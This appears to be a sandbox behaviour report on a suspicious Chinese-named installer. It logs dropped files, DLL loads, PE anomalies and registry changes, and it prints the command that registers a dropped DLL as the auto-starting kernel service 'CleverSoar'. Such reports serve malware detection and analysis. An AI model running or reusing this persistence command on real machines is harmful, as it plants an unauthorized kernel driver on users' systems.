Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic file information: File size 5707684 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2167599530.0000000003410000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2167479106.0000000003210000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_004E57D0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: real checksum: 0x0 should be: 0x579ef1
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: is-TAP4G.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE486EB push ecx; ret 6_2_6CE486FE
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCF0F00 push ss; retn 0001h6_2_6CCF0F0A
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF16F10 push eax; ret 6_2_6CF16F2E
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE7B9F4 push 004AC35Ch; ret 6_2_6CE7BA0E
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF17290 push eax; ret 6_2_6CF172BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004645F4 push 0050C35Ch; ret 10_2_0046460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FFB10 push eax; ret 10_2_004FFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FFE90 push eax; ret 10_2_004FFEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\is-TAP4G.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
